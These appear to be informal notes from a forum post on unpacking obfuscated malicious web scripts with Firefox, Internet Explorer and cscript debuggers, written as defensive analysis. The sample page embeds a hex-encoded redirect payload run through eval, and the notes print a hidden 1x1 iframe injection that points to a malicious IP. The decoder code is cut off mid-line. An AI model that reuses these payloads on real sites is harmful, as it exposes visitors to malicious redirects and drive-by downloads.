<Mozilla>
1.The sample.html file to add the debugger; statement in the beginning of the script
2.load script.html into Firefox using the browser's File
3.Use Firebug to set a breakpoint on the eval (txt); line of the script.
4.look at contents of the variable "txt"by typingthe console.log(txt) command in Firebug's Console tab.
5.Examine the deobfuscated script in the Console tab
1.The sample.html file to add the debugger; statement in the beginning of the script
2.load script.html into Firefox using the browser's File
--sample.html-
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="keywords" content="#KEYWORDS#" />
<link rel="copyright" href="http://www.gnu.org/copyleft/fdl.html" />
<title>...Berlin with the appointed export lotus notes address book of...</title>
<script>
debugger;
var arr =
"76617220726566203d20646f63756d656e742e72656665727265723b0d0a766172206c6f63203d20646f63756d656e742e6c6f636174696f6e2e687265663b0d0a696620287265662e696e6465784f662822676f6f676c652229203d3d202d31202626207265662e696e6465784f6628227961686f6f2229203d3d202d31202626207265662e696e6465784f6628226d736e2229203d3d202d3129207b0d0a09646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f61637469766566726565686f73742e636f6d2f72656d6f7665642e7068703f75726c3d22202b206c6f633b0d0a7d20656c7365207b0d0a09696620287265662e696e6465784f662822736974653a2229203e3d2030207c7c207265662e696e6465784f662822736974652533412229203e3d203029207b0d0a0909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f61637469766566726565686f73742e636f6d2f72656d6f7665642e7068703f75726c3d22202b206c6f633b0d0a097d20656c7365207b0d0a0909766172207265203d206e6577205265674578702822687474703a5c2f5c2f285b612d7a302d395c2d412d5a5c2e5d2a295c2f22293b0d0a090976617220646f6d61696e203d2072652e65786563286c6f63293b0d0a090969662028646f6d61696e203d3d206e756c6c29207b0d0a090909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f61637469766566726565686f73742e636f6d2f72656d6f7665642e7068703f75726c3d22202b206c6f633b0d0a09097d20656c7365207b0d0a0909097265203d206e65772052656745787028225c5c2e285b612d7a302d395c2d412d5a5c2e5d2a2922293b0d0a090909746f70646f6d61696e203d2072652e6578656328646f6d61696e5b315d293b0d0a090909696620287265662e696e6465784f6628646f6d61696e5b315d2920213d202d31207c7c207265662e696e6465784f6628746f70646f6d61696e5b315d2920213d202d3129207b0d0a09090909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f61637469766566726565686f73742e636f6d2f72656d6f7665642e7068703f75726c3d22202b206c6f633b0d0a0909097d20656c7365207b0d0a090909097265203d206e6577205265674578702822713d5b5e265d2a22293b0d0a09090909766172206d203d2072652e6578656328726566293b0d0a09090909696620286d203d3d206e756c6c29207b0d0a09090909097265203d206e6577205265674578702822703d5b5e265d2a22293b0d0a09090909096d203d2072652e6578656328726566293b0d0a0909090909696620286d203d3d206e756c6c29207b0d0a090909090909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f61637469766566726565686f73742e636f6d2f72656d6f7665642e7068703f75726c3d22202b206c6f633b0d0a09090909097d20656c7365207b0d0a0909090909097661722071203d206d5b305d2e737562737472696e672832293b0d0a09090909090971203d20712e7265706c616365282f5c2b2f2c20225f22293b0d0a09090909090971203d20712e7265706c616365282f5c732f2c20225f22293b0d0a090909090909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f73747570686f6d652e636f6d2f702f22202b2071202b20222e68746d6c223b0d0a09090909097d0d0a090909097d20656c7365207b0d0a09090909097661722071203d206d5b305d2e737562737472696e672832293b0d0a090909090971203d20712e7265706c616365282f5c2b2f2c20225f22293b0d0a090909090971203d20712e7265706c616365282f5c732f2c20225f22293b0d0a0909090909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f73747570686f6d652e636f6d2f702f22202b2071202b20222e68746d6c223b0d0a090909097d0d0a0909097d0d0a09097d0d0a097d0d0a7d0d0a";
var table = new Array();table['0'] = 0;table['1'] = 1;table['2'] = 2;table['3'] = 3;table['4'] = 4;table['5'] = 5;table['6'] = 6;table['7'] = 7;table['8'] = 8;table['9'] = 9;table['a'] = 10;table['b'] = 11;table['c'] = 12;table['d'] = 13;table['e'] = 14;table['f'] = 15;function markCounter(a) {
var txt = ""; var c = 0;
while (c < a.length) {txt += String.fromCharCode(table[a
eval(txt);
→3. to set a breakpoint on the eval (txt); line of the script.
4.look at contents of the variable "txt"by typingthe console.log(txt) command in Firebug's Console tab.
5.Examine the deobfuscated script in the Console tab
A***freehost.com
URL, Which is probably malicious.
---------------------------------------------------------------------------------------------------------------------------------------------------------
<IE>
1.Edit sample.html in Notepad++ to insert the "debugger;" statement in the beginning of its script.
2.Open sample.html in Internet Explorer and activate the debugger in Developer Tools.
3.Reload the script in Internet Explorer to activate the debugger.
4.Set a breakpoint using the Internet Explorer debugger on the third instance of document. write.
5.Run the script in the Internet Explorer debugger to deobfuscate its contents and reach the breakpoint.
6.Copy contents of the variable G82B54 to the clipboard and paste them into Notepad+
7.Examine the deobfuscated script in Notepad++,an d then exit Internet Explorer and the text editor
URL is Malicious Site.
G82B54 "</textarea><iframe src=\http://66.109.***.198/c76c1d2643c69857e1a677d2e0f23f8e/b1fd046f3c05b517d106b003853b1441?p=ftp\ width=1 height=1 style=\"border: 0px\"></iframe>"
--------------------------------------------------------------------------------------------------------------------------------------------VBscript
Using the Cscript Interpreter
1.Right-click vbscript.vbs and select Edit with Notepad++.A dd the following code in the beginning of the file,
2.redefining the execute function so that instead of executing its argument,
Function execute(x)
SCript.Echo(x)
End Function
cscript > vbscript.vbs > out.txt
read out.txt
1390***.cn URl is Malicious Site.
You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.